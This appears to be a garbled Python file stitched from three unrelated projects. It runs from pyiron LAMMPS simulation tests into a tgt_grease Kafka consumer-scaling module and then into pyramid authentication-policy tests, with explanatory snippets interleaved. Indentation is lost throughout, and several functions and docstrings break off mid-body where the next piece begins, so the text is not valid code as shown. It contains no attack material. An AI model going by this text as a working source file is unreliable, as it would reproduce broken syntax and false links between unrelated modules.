# Determining the supercell size
mass = mol_mass_water * n_mols / units.mol # g
vol_h2o = mass / density # in A^3
a = vol_h2o ** (1.0 / 3.0) # A
# Constructing the unitcell
n = int(round(n_mols ** (1.0 / 3.0)))
dx = 0.7
r_O = [0, 0, 0]
r_H1 = [dx, dx, 0]
r_H2 = [-dx, dx, 0]
unit_cell = (a / n) * np.eye(3)
unit_cell[0][1] += y0_shift
water = Atoms(elements=["H", "H", "O"], positions=[r_H1, r_H2, r_O], cell=unit_cell, pbc=True)
water.set_repeat([n, n, n])
return water
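The supercell edge in `_build_water` follows directly from the target density; a standalone check of that arithmetic, with Avogadro's number written out instead of `ase.units.mol`:

```python
# Standalone check of the supercell-size arithmetic used in _build_water.
N_A = 6.02214076e23          # molecules per mol
density = 1.0e-24            # g/A^3  (i.e. 1 g/cm^3)
n_mols = 27
mol_mass_water = 18.015      # g/mol

mass = mol_mass_water * n_mols / N_A   # total mass in g
vol_h2o = mass / density               # volume in A^3
a = vol_h2o ** (1.0 / 3.0)             # cube edge in A
n = int(round(n_mols ** (1.0 / 3.0)))  # molecules per edge
print(a, a / n)  # edge ~9.31 A, molecular spacing ~3.10 A
```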
def test_lammps_water(self):
self.job.structure = self._build_water()
with self.assertWarns(UserWarning):
self.job.potential = "H2O_tip3p"
with self.assertRaises(ValueError):
self.job.calc_md(temperature=350, seed=0)
with self.assertRaises(ValueError):
self.job.calc_md(temperature=[0, 100])
with self.assertRaises(ValueError):
self.job.calc_md(pressure=0)
with self.assertRaises(ValueError):
self.job.calc_md(temperature=[0, 100, 200])
self.job.calc_md(
temperature=350,
initial_temperature=350,
time_step=1,
n_ionic_steps=1000,
n_print=200,
)
file_directory = os.path.join(
self.execution_path, "..", "static", "lammps_test_files"
)
self.job.restart_file_list.append(
os.path.join(file_directory, "dump.out")
)
self.job.restart_file_list.append(
os.path.join(file_directory, "log.lammps")
)
self.job.run(run_mode="manual")
self.job.status.collect = True
self.job.run()
nodes = [
"positions",
"temperature",
"energy_tot",
"energy_pot",
"steps",
"positions",
"forces",
"cells",
"pressures",
"unwrapped_positions",
]
with self.job.project_hdf5.open("output/generic") as h_gen:
hdf_nodes = h_gen.list_nodes()
self.assertTrue(all([node in hdf_nodes for node in nodes]))
self.assertTrue(
np.array_equal(self.job["output/generic/positions"].shape, (6, 81, 3))
)
self.assertTrue(
np.array_equal(
self.job["output/generic/positions"].shape,
self.job["output/generic/forces"].shape,
)
)
self.assertEqual(len(self.job["output/generic/steps"]), 6)
def test_dump_parser_water(self):
water = self._build_water(y0_shift=0.01)
self.job.structure = water
with self.assertWarns(UserWarning):
self.job.potential = "H2O_tip3p"
self.job.calc_md(
temperature=350,
initial_temperature=350,
time_step=1,
n_ionic_steps=1000,
n_print=200,
pressure=0,
)
self.assertFalse('nan' in self.job.input.control['fix___ensemble'])
file_directory = os.path.join(
self.execution_path, "..", "static", "lammps_test_files"
)
self.job.restart_file_list.append(
os.path.join(file_directory, "log.lammps")
)
self.job.restart_file_list.append(
os.path.join(file_directory, "dump.out")
)
self.job.run(run_mode="manual")
self.job.status.collect = True
self.job.run()
positions = np.loadtxt(os.path.join(file_directory, "positions_water.dat"))
positions = positions.reshape(len(positions), -1, 3)
forces = np.loadtxt(os.path.join(file_directory, "forces_water.dat"))
forces = forces.reshape(len(forces), -1, 3)
self.assertTrue(
np.allclose(
self.job["output/generic/unwrapped_positions"], positions
)
)
uc = UnitConverter(self.job.input.control["units"])
self.assertTrue(
np.allclose(self.job["output/generic/forces"], uc.convert_array_to_pyiron_units(forces,
"forces"))
)
self.assertEqual(self.job["output/generic/energy_tot"][-1], -5906.46836142123 *
uc.lammps_to_pyiron("energy"))
self.assertEqual(self.job["output/generic/energy_pot"][-1], -5982.82004785158 *
uc.lammps_to_pyiron("energy"))
self.assertAlmostEqual(self.job["output/generic/pressures"][-2][0, 0], 515832.570508186 /
uc.pyiron_to_lammps("pressure"), 2)
self.job.write_traj(filename="test.xyz",
file_format="xyz")
atom_indices = self.job.structure.select_index("H")
snap_indices = [1, 3, 4]
orig_pos = self.job.output.positions
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices)
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos))
self.assertRaises(ValueError, self.job.write_traj, filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos)[:-1])
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos),
overwrite_cells=self.job.trajectory()._cells)
self.job.write_traj(filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos)[:-1],
overwrite_cells=self.job.trajectory()._cells[:-1])
self.assertRaises(ValueError, self.job.write_traj, filename="test.xyz",
file_format="xyz",
atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=np.zeros_like(orig_pos),
overwrite_cells=self.job.trajectory()._cells[:-1])
os.remove("test.xyz")
self.assertTrue(np.array_equal(self.job.trajectory()._positions,
orig_pos))
self.assertTrue(np.array_equal(self.job.trajectory(stride=2)._positions,
orig_pos[::2]))
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices)._positions,
orig_pos[snap_indices][:, atom_indices, :]))
nx, ny, nz = orig_pos.shape
random_array = np.random.rand(nx, ny, nz)
random_cell = np.random.rand(nx, 3, 3)
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=random_array)._positions,
random_array[snap_indices][:, atom_indices, :]))
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices,
overwrite_positions=random_array,
overwrite_cells=random_cell)._cells,
random_cell[snap_indices]))
self.assertIsInstance(self.job.get_structure(-1), Atoms)
# Test for clusters
with self.job.project_hdf5.open("output/generic") as h_out:
h_out["cells"] = None
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices)._positions,
orig_pos[snap_indices][:, atom_indices, :]))
with self.job.project_hdf5.open("output/generic") as h_out:
h_out["cells"] = np.repeat([np.array(water.cell)], len(h_out["positions"]), axis=0)
self.assertTrue(np.array_equal(
self.job.trajectory(atom_indices=atom_indices,
snapshot_indices=snap_indices)._positions,
orig_pos[snap_indices][:, atom_indices, :]))
neigh_traj_obj = self.job.get_neighbors()
self.assertTrue(np.allclose(np.linalg.norm(neigh_traj_obj.vecs, axis=-1),
neigh_traj_obj.distances))
h_indices = self.job.structure.select_index("H")
o_indices = self.job.structure.select_index("O")
self.assertLessEqual(neigh_traj_obj.distances[:, o_indices, :2].max(), 1.2)
self.assertGreaterEqual(neigh_traj_obj.distances[:, o_indices, :2].min(), 0.8)
self.assertTrue(all(np.isin(np.unique(ind_mat.flatten()), h_indices).all() for ind_mat in
neigh_traj_obj.indices[:, o_indices, :2]))
neigh_traj_obj_snaps = self.job.get_neighbors_snapshots(snapshot_indices=[2, 3, 4])
self.assertTrue(np.allclose(neigh_traj_obj.vecs[2:], neigh_traj_obj_snaps.vecs))
neigh_traj_obj.to_hdf(self.job.project_hdf5)
neigh_traj_obj_loaded = self.job["neighbors_traj"].to_object()
# self.assertEqual(neigh_traj_obj._init_structure, neigh_traj_obj_loaded._init_structure)
self.assertEqual(neigh_traj_obj._num_neighbors, neigh_traj_obj_loaded._num_neighbors)
self.assertTrue(np.allclose(neigh_traj_obj.indices, neigh_traj_obj_loaded.indices))
self.assertTrue(np.allclose(neigh_traj_obj.distances, neigh_traj_obj_loaded.distances))
self.assertTrue(np.allclose(neigh_traj_obj.vecs, neigh_traj_obj_loaded.vecs))
self.assertEqual(self.job.units, "real")
def test_dump_parser(self):
structure = Atoms(
elements=2 * ["Fe"],
cell=2.78 * np.eye(3),
positions=2.78 * np.outer(np.arange(2), np.ones(3)) * 0.5,
)
self.job.structure = structure
self.job.potential = self.job.list_potentials()[0]
file_directory = os.path.join(
self.execution_path, "..", "static", "lammps_test_files"
)
self.job.collect_dump_file(cwd=file_directory, file_name="dump_static.out")
self.assertTrue(
np.array_equal(self.job["output/generic/forces"].shape, (1, 2, 3))
)
self.assertTrue(
np.array_equal(self.job["output/generic/positions"].shape, (1, 2, 3))
)
self.assertTrue(
np.array_equal(self.job["output/generic/cells"].shape, (1, 3, 3))
)
self.assertTrue(
np.array_equal(self.job["output/generic/indices"].shape, (1, 2))
)
def test_vcsgc_input(self):
unit_cell = Atoms(
elements=['Al', 'Al', 'Al', 'Mg'],
positions=[
[0., 0., 0.],
[0., 2., 2.],
[2., 0., 2.],
[2., 2., 0.]
],
cell=4 * np.eye(3)
)
self.job.structure = unit_cell
self.job.potential = self.job.list_potentials()[0]
symbols = self.job.input.potential.get_element_lst()
with self.subTest("Fail when elements outside the periodic table are used"):
bad_element = {s: 0. for s in symbols}
bad_element.update({'X': 1.}) # Non-existent chemical symbol
self.assertRaises(ValueError, self.job.calc_vcsgc, mu=bad_element, temperature_mc=300.)
self.assertRaises(ValueError, self.job.calc_vcsgc, target_concentration=bad_element, temperature_mc=300.)
with self.subTest("Fail when concentrations don't add to 1"):
bad_conc = {s: 0. for s in symbols}
bad_conc['Al'] = 0.99
self.assertRaises(ValueError, self.job.calc_vcsgc, target_concentration=bad_conc, temperature_mc=300.)
with self.subTest("Check window definitions"):
for bad_window in [-1, 1.1]:
self.assertRaises(ValueError, self.job.calc_vcsgc, window_moves=bad_window, temperature_mc=300.)
self.assertRaises(ValueError, self.job.calc_vcsgc, window_size=0.3, temperature_mc=300.)
with self.subTest("Temperature can't be None"):
mu = {s: 0. for s in symbols}
mu[symbols[0]] = 1.
self.assertRaises(ValueError, self.job.calc_vcsgc, mu=mu, temperature_mc=None, temperature=None)
args = dict(
mu=mu,
target_concentration=None,
kappa=1000.0,
mc_step_interval=100,
swap_fraction=0.1,
temperature_mc=None,
window_size=None,
window_moves=None,
seed=1,
temperature=300.0,
)
input_string = 'all sgcmc {0} {1} {2} {3} randseed {4}'.format(
args['mc_step_interval'],
args['swap_fraction'],
args['temperature'],
' '.join([str(args['mu'][symbol] - args['mu'][symbols[0]]) for symbol in symbols[1:]]),
args['seed']
)
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
args['temperature_mc'] = 100.
input_string = 'all sgcmc {0} {1} {2} {3} randseed {4}'.format(
args['mc_step_interval'],
args['swap_fraction'],
args['temperature_mc'],
' '.join([str(args['mu'][symbol] - args['mu'][symbols[0]]) for symbol in symbols[1:]]),
args['seed']
)
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
conc = {s: 0. for s in symbols}
conc[symbols[0]] = 0.5
conc[symbols[-1]] = 0.5
args['target_concentration'] = conc
input_string += ' variance {0} {1}'.format(
args['kappa'],
' '.join([str(conc[symbol]) for symbol in symbols[1:]])
)
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
args['window_moves'] = 10
input_string += ' window_moves {0}'.format(args['window_moves'])
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
args['window_size'] = 0.75
input_string += ' window_size {0}'.format(args['window_size'])
self.job.calc_vcsgc(**args)
self.assertEqual(
self.job.input.control['fix___vcsgc'], input_string,
msg="Parser did not reproduce expected lammps control syntax"
)
self.job.to_hdf()
for k, v in args.items():
if k not in ("mu", "target_concentration", "mc_step_interval", "swap_fraction", "temperature_mc"):
continue
self.assertEqual(
self.job._generic_input[k], v,
msg=f"Wrong value stored in generic input for parameter {k}!"
)
# decode saved GenericParameters manually...
data = self.job["input/generic/data_dict"]
self.assertEqual(
data["Value"][data["Parameter"].index(k)], str(v),
msg=f"Wrong value stored in HDF for parameter {k}!"
)
def test_calc_minimize_input(self):
# tgt_grease/enterprise/Model/KafkaSource.py
import json
from time import time
import threading
from multiprocessing import Pipe
import kafka
from kafka import KafkaConsumer
from tgt_grease.core import GreaseContainer
from tgt_grease.enterprise.Model.CentralScheduling import Scheduling
from .Configuration import PrototypeConfig
MIN_BACKLOG = 50 # If the Kafka message backlog falls below this number, we will kill a consumer
MAX_BACKLOG = 200 # If the Kafka message backlog rises above this number, we will make a consumer
SLEEP_TIME = 5 # Sleep this many seconds after creating or deleting a consumer.
MAX_CONSUMERS = 32 # We won't create more than this number of consumers for any config
class KafkaSource(object):
"""Kafka class for sourcing Kafka messages
This Model will create and dynamically scale the number of Kafka consumers for the topics
in the Config, and then sends the parsed messages (containing only the keys/values specified
in the Config) to Scheduling.
This Model is designed around the Configs. Each Config gets its own config_manager thread,
which means each Config also gets its own dedicated consumer. It was designed so that any
"magic numbers" (such as MIN_BACKLOG, MAX_CONSUMERS, etc.) can be overridden in the Config,
with the exception of SLEEP_TIME, which is constant across Configs.
Currently, the class only supports Kafka topics that contain JSON; this functionality
can be extended inside the parse_message method.
Attributes:
ioc (GreaseContainer): IOC for scanning
conf (PrototypeConfig): Prototype configuration instance
configs (List[dict]): List of Kafka Configs
Note:
Currently, only json messages can be decoded from kafka topics
"""
def __init__(self, ioc=None):
if ioc and isinstance(ioc, GreaseContainer):
self.ioc = ioc
else:
self.ioc = GreaseContainer()
self.conf = PrototypeConfig(self.ioc)
self.configs = []
def run(self, config=None):
"""This will load all Kafka configs (unless a specific one is provided) and spin up consumer
threads for all of them.
It should never return anything unless something goes wrong with Kafka consumption.
Creates a thread for each Kafka config to begin parsing messages. This parent thread then
monitors its children, and prunes dead threads. Once all are dead, we return False.
Note:
If a configuration is set then *only* that configuration is parsed.
Args:
config (dict): If set will only parse the specified config
Returns:
bool: False if an error occurs, else never returns
"""
if config:
self.configs = [config]
else:
self.configs = self.get_configs()
if not self.validate_configs(self.configs):
self.ioc.getLogger().error("One or more Kafka Configs are invalid, stopping.")
return False
threads = []
for conf in self.configs:
threads.append(self.create_consumer_manager_thread(conf))
while threads:
threads = list(filter(lambda x: x.is_alive(), threads))
self.ioc.getLogger().critical("All Kafka consumer managers have died, stopping.")
return False
def create_consumer_manager_thread(self, config):
"""Creates and returns a thread running a consumer_manager
Args:
config (dict): Configuration for a Kafka Model
Returns:
threading.Thread: The thread running consumer_manager
"""
KafkaSource.sleep(SLEEP_TIME)
thread = threading.Thread(target=KafkaSource.consumer_manager, args=(self.ioc, config,))
thread.daemon = False
thread.start()
self.ioc.getLogger().info("Kafka consumer manager thread started for config: {0}".format(config.get("name")))
return thread
@staticmethod
def consumer_manager(ioc, config):
"""Creates and reallocates consumer threads within the same consumer group for a single config
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
Returns:
bool: False if all consumers are stopped
"""
monitor_consumer = KafkaSource.create_consumer(ioc, config)
threads = [KafkaSource.create_consumer_thread(ioc, config)]
while threads:
KafkaSource.reallocate_consumers(ioc, config, monitor_consumer, threads)
threads = list(filter(lambda x: x[0].is_alive(), threads))
return False
@staticmethod
def create_consumer_thread(ioc, config):
"""Creates a consumer thread, pipe pair for a given config
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
Returns:
threading.Thread: The Thread running the Kafka consumer
multiprocessing.Pipe: The parent end of the Pipe used to send a kill signal to the consumer thread
"""
parent_conn, child_conn = Pipe()
thread = threading.Thread(target=KafkaSource.consume, args=(ioc, config, child_conn,))
thread.daemon = True
thread.start()
ioc.getLogger().info("Kafka consumer thread started for config: {0}".format(config.get("name")))
return thread, parent_conn
@staticmethod
def consume(ioc, config, pipe):
"""The Kafka consumer in charge of parsing messages according to the config, then sends the parsed dict to Scheduling
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
pipe (multiprocessing.Pipe): Child end of the pipe used to receive signals from parent thread
Returns:
bool: False if kill signal is received
"""
consumer = KafkaSource.create_consumer(ioc, config)
for msg in consumer:
if pipe.poll(): # If the parent pipe sends a signal
ioc.getLogger().trace("Kill signal received, stopping", trace=True)
return False
message_dict = KafkaSource.parse_message(ioc, config, msg)
if message_dict:
KafkaSource.send_to_scheduling(ioc, config, message_dict)
return False
@staticmethod
def sleep(sleep_sec):
"""Thread safe sleep function that waits sleep_sec seconds without affecting child threads
Args:
sleep_sec (int): Number of seconds to idle
"""
wake_time = time() + sleep_sec
while time() < wake_time:
continue
@staticmethod
def create_consumer(ioc, config):
"""Creates a KafkaConsumer object from the params in config
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka Model
Returns:
kafka.KafkaConsumer: KafkaConsumer object initialized with params from config
"""
consumer = None
while not consumer:
try:
consumer = KafkaConsumer(
group_id=config.get('name'),
*config.get('topics'),
**{'bootstrap_servers': ",".join(config.get('servers'))}
)
except kafka.errors.NoBrokersAvailable:
ioc.getLogger().error("No Kafka brokers available for config: {0}, retrying.".format(config.get('name')))
KafkaSource.sleep(SLEEP_TIME)
ioc.getLogger().info("Kafka consumer created under group_id: {0}".format(config.get('name')))
KafkaSource.sleep(SLEEP_TIME) # Gives the consumer time to initialize
return consumer
@staticmethod
def parse_message(ioc, config, message):
"""Parses a message from Kafka according to the config
Note:
parse_message extracts only the keys/values from the message as specified in the config. By default, keys are split on "." - so to access the value stored at message[a][b][c], your config would contain the key "a.b.c". You can override the "." key separator explicitly in your config ("key_sep"). Each extracted value is written to its respective alias as specified in the config.
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka model
message (kafka.ConsumerRecord): Individual message received from Kafka topic
Returns:
dict: A flat dictionary containing only the keys/values from the message as specified in the config
"""
try:
message = json.loads(message.value, strict=False)
ioc.getLogger().trace("Message successfully loaded", trace=True)
except ValueError:
ioc.getLogger().trace("Failed to parse message as JSON", trace=True)
return {}
final = {}
for key, alias in config.get("key_aliases", {}).items():
pointer = message
for sub_key in key.split(config.get("key_sep", ".")):
if not isinstance(pointer, dict) or sub_key not in pointer:
ioc.getLogger().trace("Subkey: {0} missing from message".format(sub_key), trace=True)
return {}
pointer = pointer[sub_key]
final[alias] = str(pointer)
ioc.getLogger().trace("Message successfully parsed", trace=True)
return final
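The dotted-key extraction described in the docstring note can be illustrated standalone (hypothetical config and message; the ioc logging is omitted, and extract_aliases is a stand-in for the key-walking portion of parse_message):

```python
import json

def extract_aliases(config, message):
    """Walk each dotted key from config['key_aliases'] through the nested
    message dict, returning a flat {alias: str(value)} dict, or {} if any
    sub-key is missing along the way."""
    final = {}
    for key, alias in config.get("key_aliases", {}).items():
        pointer = message
        for sub_key in key.split(config.get("key_sep", ".")):
            if not isinstance(pointer, dict) or sub_key not in pointer:
                return {}
            pointer = pointer[sub_key]
        final[alias] = str(pointer)
    return final

config = {"key_aliases": {"a.b.c": "deep_value"}}
message = json.loads('{"a": {"b": {"c": 42}}}')
print(extract_aliases(config, message))  # {'deep_value': '42'}
```

Note that a missing sub-key anywhere in the path rejects the whole message, matching the early `return {}` above.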
@staticmethod
def reallocate_consumers(ioc, config, monitor_consumer, threads):
"""Determines whether to create or kill a consumer based on current message backlog, then performs that action
Args:
ioc (GreaseContainer): Used for logging since we can't use self in threads
config (dict): Configuration for a Kafka model
monitor_consumer (kafka.KafkaConsumer): KafkaConsumer used solely for measuring message backlog
threads (list[(threading.Thread, multiprocessing.Pipe)]): List of current consumer thread/pipe pairs
Returns:
int: Number of threads created (Negative value if a thread was killed)
"""
min_backlog = config.get("min_backlog", MIN_BACKLOG)
max_backlog = config.get("max_backlog", MAX_BACKLOG)
max_consumers = config.get("max_consumers", MAX_CONSUMERS)
backlog1 = KafkaSource.get_backlog(ioc, monitor_consumer)
KafkaSource.sleep(SLEEP_TIME) # We want to wait before checking again in case there is a message spike
backlog2 = KafkaSource.get_backlog(ioc, monitor_consumer)
if backlog1 > max_backlog and backlog2 > max_backlog and len(threads) < max_consumers:
threads.append(KafkaSource.create_consumer_thread(ioc, config))
ioc.getLogger().info("Backlog max reached, spawning a new consumer for {0}".format(config.get('name')), verbose=True)
return 1
elif backlog1 <= min_backlog and backlog2 <= min_backlog and len(threads) > 1:
KafkaSource.kill_consumer_thread(ioc, threads[0])
ioc.getLogger().info("Backlog min reached, killing a consumer for {0}".format(config.get('name')), verbose=True)
return -1
ioc.getLogger().info("No reallocation needed for {0}".format(config.get('name')))
return 0
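Stripped of logging and I/O, the scaling rule above reduces to a small pure function. The default thresholds here are illustrative stand-ins for MIN_BACKLOG, MAX_BACKLOG, and MAX_CONSUMERS, which are defined elsewhere in the module:

```python
def reallocation_decision(backlog1, backlog2, n_threads,
                          min_backlog=100, max_backlog=200, max_consumers=32):
    """Return +1 to spawn a consumer, -1 to kill one, 0 for no change.
    Both backlog samples must agree, which filters out transient spikes."""
    if backlog1 > max_backlog and backlog2 > max_backlog and n_threads < max_consumers:
        return 1
    if backlog1 <= min_backlog and backlog2 <= min_backlog and n_threads > 1:
        return -1
    return 0
```

Requiring both samples (taken SLEEP_TIME apart) to cross the threshold is what prevents a single message burst from spawning a consumer that is killed moments later.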
@staticmethod
def kill_consumer_thread(ioc, thread_tup):
"""Sends a kill signal to the thread's pipe
Note:
Despite being from the multiprocessing library, Pipes are thread safe in this implementation as we don't share the same
end of the Pipe to more than one thread. From the multiprocessing documentation:
The two connection objects returned by Pipe() represent the two ends of the pipe. Each connection object has
send() and recv() methods (among others). Note that data in a pipe may become corrupted if two processes
(or threads) try to use the same end of the pipe at the same time.
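The thread/pipe kill mechanism described in the note (the parent sends any object down its end; the consumer loop checks pipe.poll()) can be demonstrated standalone. The worker below is a minimal stand-in for the consume loop, not the actual consumer:

```python
import threading
import time
from multiprocessing import Pipe

def worker(pipe, results):
    """Stand-in for the consume loop: exit when the parent signals."""
    while True:
        if pipe.poll():  # any object sent by the parent acts as a kill signal
            results.append("killed")
            return
        time.sleep(0.01)

parent_conn, child_conn = Pipe()
results = []
t = threading.Thread(target=worker, args=(child_conn, results))
t.daemon = True
t.start()
parent_conn.send("STOP")  # the payload is irrelevant; poll() just sees pending data
t.join(timeout=2)
```

Because each end of the Pipe is owned by exactly one thread, no locking is needed around send()/poll().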
import unittest
import warnings
from pyramid import testing
from pyramid.compat import (
text_,
bytes_,
)
class TestCallbackAuthenticationPolicyDebugging(unittest.TestCase):
def setUp(self):
from pyramid.interfaces import IDebugLogger
self.config = testing.setUp()
self.config.registry.registerUtility(self, IDebugLogger)
self.messages = []
def tearDown(self):
del self.config
def debug(self, msg):
self.messages.append(msg)
def _makeOne(self, userid=None, callback=None):
from pyramid.authentication import CallbackAuthenticationPolicy
class MyAuthenticationPolicy(CallbackAuthenticationPolicy):
def unauthenticated_userid(self, request):
return userid
policy = MyAuthenticationPolicy()
policy.debug = True
policy.callback = callback
return policy
def test_authenticated_userid_no_unauthenticated_userid(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne()
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'authenticated_userid: call to unauthenticated_userid returned '
'None; returning None')
def test_authenticated_userid_no_callback(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='fred')
self.assertEqual(policy.authenticated_userid(request), 'fred')
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: there was no groupfinder callback; "
"returning 'fred'")
def test_authenticated_userid_with_callback_fail(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return None
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'authenticated_userid: groupfinder callback returned None; '
'returning None')
def test_authenticated_userid_with_callback_success(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return []
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(policy.authenticated_userid(request), 'fred')
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: groupfinder callback returned []; "
"returning 'fred'")
def test_authenticated_userid_fails_cleaning_as_Authenticated(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Authenticated')
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: use of userid 'system.Authenticated' is "
"disallowed by any built-in Pyramid security policy, returning "
"None")
def test_authenticated_userid_fails_cleaning_as_Everyone(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Everyone')
self.assertEqual(policy.authenticated_userid(request), None)
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"authenticated_userid: use of userid 'system.Everyone' is "
"disallowed by any built-in Pyramid security policy, returning "
"None")
def test_effective_principals_no_unauthenticated_userid(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne()
self.assertEqual(policy.effective_principals(request),
['system.Everyone'])
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: unauthenticated_userid returned None; "
"returning ['system.Everyone']")
def test_effective_principals_no_callback(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='fred')
self.assertEqual(
policy.effective_principals(request),
['system.Everyone', 'system.Authenticated', 'fred'])
self.assertEqual(len(self.messages), 2)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'effective_principals: groupfinder callback is None, so groups '
'is []')
self.assertEqual(
self.messages[1],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: returning effective principals: "
"['system.Everyone', 'system.Authenticated', 'fred']")
def test_effective_principals_with_callback_fail(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return None
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(
policy.effective_principals(request), ['system.Everyone'])
self.assertEqual(len(self.messages), 2)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'effective_principals: groupfinder callback returned None as '
'groups')
self.assertEqual(
self.messages[1],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: returning effective principals: "
"['system.Everyone']")
def test_effective_principals_with_callback_success(self):
request = DummyRequest(registry=self.config.registry)
def callback(userid, request):
return []
policy = self._makeOne(userid='fred', callback=callback)
self.assertEqual(
policy.effective_principals(request),
['system.Everyone', 'system.Authenticated', 'fred'])
self.assertEqual(len(self.messages), 2)
self.assertEqual(
self.messages[0],
'pyramid.tests.test_authentication.MyAuthenticationPolicy.'
'effective_principals: groupfinder callback returned [] as groups')
self.assertEqual(
self.messages[1],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: returning effective principals: "
"['system.Everyone', 'system.Authenticated', 'fred']")
def test_effective_principals_with_unclean_principal_Authenticated(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Authenticated')
self.assertEqual(
policy.effective_principals(request),
['system.Everyone'])
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: unauthenticated_userid returned disallowed "
"'system.Authenticated'; returning ['system.Everyone'] as if it "
"was None")
def test_effective_principals_with_unclean_principal_Everyone(self):
request = DummyRequest(registry=self.config.registry)
policy = self._makeOne(userid='system.Everyone')
self.assertEqual(
policy.effective_principals(request),
['system.Everyone'])
self.assertEqual(len(self.messages), 1)
self.assertEqual(
self.messages[0],
"pyramid.tests.test_authentication.MyAuthenticationPolicy."
"effective_principals: unauthenticated_userid returned disallowed "
"'system.Everyone'; returning ['system.Everyone'] as if it "
"was None")
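The debug messages asserted above pin down a simple contract. As a sketch (not pyramid's actual implementation), effective_principals reduces to:

```python
def effective_principals(userid, groups):
    """Sketch of the contract the tests above exercise: userid is the
    unauthenticated userid (or None); groups is the groupfinder result,
    where None means authentication failed and [] means no extra groups."""
    disallowed = {'system.Everyone', 'system.Authenticated'}
    if userid is None or userid in disallowed or groups is None:
        return ['system.Everyone']
    return ['system.Everyone', 'system.Authenticated', userid] + list(groups)
```

Every failure mode (no userid, a disallowed system principal, a groupfinder returning None) collapses to the bare ['system.Everyone'] list.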
class TestRepozeWho1AuthenticationPolicy(unittest.TestCase):
def _getTargetClass(self):
from pyramid.authentication import RepozeWho1AuthenticationPolicy
return RepozeWho1AuthenticationPolicy
def _makeOne(self, identifier_name='auth_tkt', callback=None):
return self._getTargetClass()(identifier_name, callback)
def test_class_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyClass
from pyramid.interfaces import IAuthenticationPolicy
verifyClass(IAuthenticationPolicy, self._getTargetClass())
def test_instance_implements_IAuthenticationPolicy(self):
from zope.interface.verify import verifyObject
from pyramid.interfaces import IAuthenticationPolicy
verifyObject(IAuthenticationPolicy, self._makeOne())
def test_unauthenticated_userid_returns_None(self):
request = DummyRequest({})
policy = self._makeOne()
